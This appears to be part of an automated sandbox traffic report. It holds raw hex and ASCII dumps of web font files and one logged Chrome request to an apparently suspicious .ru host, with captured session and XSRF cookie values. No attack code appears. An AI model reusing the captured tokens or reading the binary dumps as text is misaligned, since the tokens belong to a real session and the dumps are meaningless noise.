                                                2024-05-30 10:21:10 UTC753INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                2024-05-30 10:21:10 UTC1369INData Raw: e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93 7a cd 73 01 6e b9
                                                Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ Xzsn
                                                2024-05-30 10:21:10 UTC1369INData Raw: 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd 24 bd 7e 42 53 3e
                                                Data Ascii: 0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I$~BS>
                                                2024-05-30 10:21:10 UTC1369INData Raw: fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01 9d 5a 25 56 9b 9b
                                                Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFxZ%V
                                                2024-05-30 10:21:10 UTC1369INData Raw: c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e 8d bc 0a 1b c8 14
                                                Data Ascii: ,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                                                2024-05-30 10:21:10 UTC1369INData Raw: c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be ed b1 78 f5 6d 48
                                                Data Ascii: ^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=xmH
                                                2024-05-30 10:21:10 UTC1369INData Raw: 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8 7a d5 90 a4 f5 bb
                                                Data Ascii: CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oSz
                                                2024-05-30 10:21:10 UTC1369INData Raw: f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1 64 9a 6e d7 e8 c1
                                                Data Ascii: Qa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=Wdn
                                                2024-05-30 10:21:10 UTC1369INData Raw: 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41 35 e7 6c 42 45 56
                                                Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A5lBEV
                                                2024-05-30 10:21:10 UTC1369INData Raw: 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1 24 df 05 b6 03 ae
                                                Data Ascii: T;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg$


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.449786188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1378OUTGET /23rACQ3TWSEp90OaR5XE1xy67 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC621INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: font/woff
                                                Content-Length: 36696
                                                Connection: close
                                                Content-Disposition: inline; filename="23rACQ3TWSEp90OaR5XE1xy67"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCv%2FlbsFtQ7LIWiBtx4R5JA1TLIEjETeKhur%2F3nFy6YjKEQgIQvuxeJl0NwK15zJi2f5MIsDmZam68MEgQfwGYNxCReyABvELk46OROsdDE%2BVVBz5bXhqmHt%2Bg6VgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeead9b1c439-EWR
                                                2024-05-30 10:21:10 UTC1369INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                2024-05-30 10:21:10 UTC1369INData Raw: 08 98 94 03 93 03 c0 64 bb c1 24 ac 26 69 0a 82 e3 36 16 41 35 03 54 7e 15 b5 cf e4 fd 68 b9 12 2d 7f a9 16 4a ab d5 68 b5 1a ad 96 41 7f f7 f2 52 50 ef 03 35 00 54 d1 b2 51 05 4e 95 81 53 69 90 0f 1f 70 f1 41 63 33 81 4b 0d 38 56 02 8a ac 33 5c 0b a0 fd ed ea 79 5c bf 00 0a d8 54 d8 09 0e 56 83 83 d5 a0 40 40 28 a0 75 62 26 25 83 8b bb d0 eb 4d 1e 2e 5a e0 62 00 f2 70 0f 5d 05 6b 71 16 30 b9 07 fd fe 09 9d 8b bb 3c b9 cb c3 5d 77 dc 05 a1 8f bb 79 89 07 d3 d5 94 0f ec ba 00 bb 0c 60 e7 53 63 c8 0f 2a f5 05 76 9b 41 a5 7c 50 a9 00 58 e6 82 4a 0d c0 b2 cc d6 5a 2d 67 94 a5 5e c4 79 12 f5 02 b6 7b 41 ad 9e a0 54 0f 60 3b 00 d8 9e 0f 7e 15 00 5b 1f 78 d5 4b bd 8e 72 b3 51 ef 02 d4 b3 90 fa 03 f3 1c 60 dc 1f 4f 7d e8 4f 2a 52 1a d2 58 2e 85 fd 98 c5 47 c0 bf
                                                Data Ascii: d$&i6A5T~h-JhARP5TQNSipAc3K8V3\y\TV@@(ub&%M.Zbp]kq0<]wy`Sc*vA|PXJZ-g^y{AT`;~[xKrQ`O}O*RX.G
                                                2024-05-30 10:21:10 UTC1369INData Raw: 65 88 5a 63 0f f4 93 4f 22 9e 48 dc 91 29 96 c6 6a 35 37 d8 e2 99 a3 cf 81 84 ca 4c 58 3c 4c 10 b1 1d 69 3b 0d f9 a9 c2 e3 01 76 a4 02 7a 23 ba d1 74 85 85 2c f7 c8 cc 35 5e 0f 15 47 96 be 1d dc 1b b4 97 47 2c 73 50 7c fd df c3 31 a0 d3 60 9a d3 8e bc 67 b4 fa 66 42 7d 16 a2 de 06 5e 88 88 77 3e 6c 64 43 e7 12 0e e8 6a 98 df 40 bc f5 9a 6b 19 ad 96 65 dc 78 b9 95 3a 12 46 f7 5a 58 3c bf b1 d5 e1 38 f1 4c 3f ca 15 2f 64 45 c5 38 ce 39 39 71 92 03 6c 2d 60 6b 19 0c 2c 0f 5e 6d e1 4e 51 b8 27 4a 66 42 3a aa e5 ba e8 51 45 9c 03 b8 77 c8 c8 ab b5 7e 55 7d bd fc bf 3d dd 23 9a a6 bd e8 29 49 59 47 d1 55 6d 67 96 22 de 5a 12 3d 02 89 44 e8 ba 84 1d bb 7b 66 34 fa 76 04 dc a3 70 a8 87 ad 3c c9 cc 75 74 3e ae 56 d1 59 90 f1 26 ea 42 67 b8 25 4a 44 3f 2f b5 c7 e3
                                                Data Ascii: eZcO"H)j57LX<Li;vz#t,5^GG,sP|1`gfB}^w>ldCj@kex:FZX<8L?/dE899ql-`k,^mNQ'JfB:QEw~U}=#)IYGUmg"Z=D{f4vp<ut>VY&Bg%JD?/
                                                2024-05-30 10:21:10 UTC1369INData Raw: a5 77 b5 ed ff 41 83 72 8f cd dd eb e2 6e 39 7b 5b 9d d9 5a 0f ee 64 7a 59 0a 0e 68 dc 77 d0 29 ee 5d d4 5f 16 88 0e 55 80 f3 3a 16 3b 86 73 15 e4 a5 42 74 ae 09 d6 b3 d1 68 71 53 0b 9b e4 8b 89 6e 6c 3d ad 05 bd 1a 64 95 ad 01 3c f2 89 3c 65 38 f1 1b 24 a7 07 6a 4a 73 57 b7 92 a3 ea 4d 91 1e fb 4e cd ee a0 25 1f 30 44 14 a6 6d 39 5a d3 bb f8 9b f4 de 4e 63 7f 8f 82 2b 15 f6 3e 78 80 f1 a1 ba 4f a2 cb fa 19 47 45 73 da 97 39 5e b6 02 18 fa 0c a7 2c 63 df cb 65 17 b7 a6 49 9d c7 ca eb 7a 6b a5 b7 95 d0 ed 7a b3 ca d8 0e f5 11 cb fc 37 f5 16 f0 63 64 fd 1a 2c c4 41 7e 8e 2e 44 b4 71 1f ac cd fb fc 16 9e 7c 28 3a a1 39 f2 10 62 fd a5 88 3e 1a f8 53 fe 25 f2 b7 9a 95 c2 3a 63 47 7a 53 a6 c8 55 21 a2 93 83 74 07 ae 83 18 cd bf 41 b9 b0 24 7a d5 f9 00 ef 06 5d
                                                Data Ascii: wArn9{[ZdzYhw)]_U:;sBthqSnl=d<<e8$jJsWMN%0Dm9ZNc+>xOGEs9^,ceIzkz7cd,A~.Dq|(:9b>S%:cGzSU!tA$z]
                                                2024-05-30 10:21:10 UTC1369INData Raw: e8 39 0f ef 1d ac 8f 3f d6 ae ba b8 17 7b 70 5f 6e 6c 60 1e 6f e1 5b f1 64 35 7c b6 3d d2 b4 71 2f 8b 8c 32 5a ae 39 9c 0a ee 71 c7 08 41 4d 33 c7 ee ca 5c d5 11 57 0b 3e 07 ee 96 bd 0e aa e3 f8 d6 78 07 8b fc 25 a5 da ff af 01 59 c8 c7 78 50 ff 3f 4d 46 e4 1f 37 f8 32 c4 30 3d 61 85 4f 4a 34 23 75 8a bf cf f7 8c 47 6a c5 b7 17 50 ae e8 61 50 be 5b eb 0b 48 47 3d da 3f 64 9b f7 fc 3a 16 d0 63 39 58 f6 6a b4 15 12 cd cd 92 7f b8 d1 35 f6 38 9d 48 4a db 64 d7 33 36 99 31 7c 63 d4 57 4f 49 51 a3 26 ef cc 4a 0c 65 65 0c f1 71 1c 3e 37 9a 91 5c a5 d9 53 57 ef 46 88 3e 3b de d7 ff 33 f1 15 44 2d 66 65 0c b5 db bb f6 d3 63 c6 ae fa ff 46 1a a5 0f dd e3 8e 71 2d db 53 0a 4e be 18 4f ec 8d b8 fc 26 df fe 9e 30 57 a8 ed 33 57 a7 3f c7 71 02 54 cb 12 1b 7b 82 17 ba
                                                Data Ascii: 9?{p_nl`o[d5|=q/2Z9qAM3\W>x%YxP?MF720=aOJ4#uGjPaP[HG=?d:c9Xj58HJd361|cWOIQ&Jeeq>7\SWF>;3D-fecFq-SNO&0W3W?qT{
                                                2024-05-30 10:21:10 UTC1369INData Raw: 49 6f 12 f2 bd be 72 9e e6 7b cb 0a 79 d1 11 0b 7c c5 45 34 76 44 81 97 37 7e b0 34 df c7 87 b2 b2 e1 23 f8 e8 17 47 f2 c3 2f 8e e2 97 5f 4c e5 77 47 d4 db 1c f1 e2 c8 ba ec b8 18 60 31 d0 22 62 c3 e8 73 5d d7 0b 91 67 ac 27 56 8c 63 bd 50 79 01 62 27 96 a1 2c e7 9e 7e 3f 1d 9f 73 da 79 ec 34 39 7f 6c 0d 37 db bd b5 56 68 a8 6b ad ed 9e 25 a8 73 98 58 75 fb 0d 93 1f 69 bd 6f f2 ea ed 54 11 ca 0e b6 33 86 31 48 93 19 ed ce a8 53 cb 6c 61 b6 de 4a 8b 91 fe a3 26 c4 46 eb db f5 1c 63 6d 90 6a 47 6b 97 fd 54 f7 8b ee d6 aa d3 57 6b 1b f8 a8 7e 75 7c 12 36 f0 59 f8 dc d6 a8 fd f7 16 c7 a4 71 43 15 83 34 5b 88 fe 87 aa 57 b8 d5 82 47 ca e9 22 45 44 49 3f d1 d2 45 77 a9 28 56 ea 88 93 96 e2 5d 8d d0 87 be ea d9 9f 24 29 73 00 c9 ea 3e 98 14 86 88 bb 61 a4 32 5a
                                                Data Ascii: Ior{y|E4vD7~4#G/_LwG`1"bs]g'VcPyb',~?sy49l7Vhk%sXuioT31HSlaJ&FcmjGkTWk~u|6YqC4[WG"EDI?Ew(V]$)s>a2Z
                                                2024-05-30 10:21:10 UTC1369INData Raw: 55 87 27 14 c1 63 aa ab 4b b9 9c 5d 3c af 46 3c a7 48 9e 56 63 1a b0 91 91 ba 9c d1 ba 82 51 6a 46 a2 ae 64 8c 9a 33 5e 2d 19 ab ab 98 a8 d6 4c 50 2b ae e0 23 a6 ea 5a a6 e9 1a a6 a8 3d d3 75 1d 2f eb 7a 1a b1 95 57 15 cb 1c dd c2 5c de 54 57 16 e8 0e 52 d5 8d b7 58 a8 3b 8d d9 96 e6 bc 56 5c cd 31 da 99 03 fb eb 62 9e 95 c7 2b 6a c7 0c dd c8 4c dd 44 b2 3a 32 4b 37 d0 dc b2 e7 00 ad 39 ce cd 7c cb 0b 6a ca 38 b5 e0 45 5d ad 7b d4 57 bd 35 40 f7 aa 27 8f ab 36 29 ba 99 d9 8a e1 35 75 62 be 6e e7 7a be e6 26 be e1 3a 4e d2 91 2f 2d bf be b2 a4 38 c1 1d 9c a1 97 85 dc 5d 14 d3 93 22 86 eb 32 86 29 8a 11 6a c2 eb ea cc 3c dd a6 e7 35 4c 2f 68 b8 46 68 a4 e6 68 ae a6 ea 90 f2 18 48 01 87 24 55 d6 45 aa a6 bb d4 47 fd 09 d7 29 73 f1 85 e6 80 90 3f 1c cd ff 19
                                                Data Ascii: U'cK]<F<HVcQjFd3^-LP+#Z=u/zW\TWRX;V\1b+jLD:2K79|j8E]{W5@'6)5ubnz&:N/-8]"2)j<5L/hFhhH$UEG)s?
                                                2024-05-30 10:21:10 UTC1369INData Raw: ad c0 77 46 96 f0 43 c7 84 a8 63 42 c8 bd 8c 5c f6 11 28 db 85 d1 5b 22 26 2d db 8b a3 c5 7a f3 ca c0 b1 52 f5 ef c3 70 bc 85 9f b6 ce bc 48 0a d4 1d b3 ee 10 cb 23 7d d9 0a 7d 19 cb f4 58 dc 3c 3d 30 8f 0d 08 ca 2c 2d bb 1a 3a bb c6 12 ce f0 0c c7 f2 5c a3 43 e7 2a 94 98 f6 6e 30 70 77 22 42 a1 f0 12 61 4a 51 06 6a 2d 7e 88 89 89 8e d2 47 ea 24 61 88 45 b1 aa 6f 17 06 e8 81 74 5d 3a 10 6e 50 28 f0 9d 23 b7 2f d6 d5 80 4c fc 12 45 57 9e c8 fc d5 fd 54 26 d6 dd e8 ef 79 78 85 59 b8 8c be da e1 31 fd 2b 75 cb b3 c8 f3 ca 79 e4 fe 42 fb 4b 37 f3 8e 1f 98 75 e8 17 03 db 3e 38 31 bf ac ff d4 ac f0 61 ab 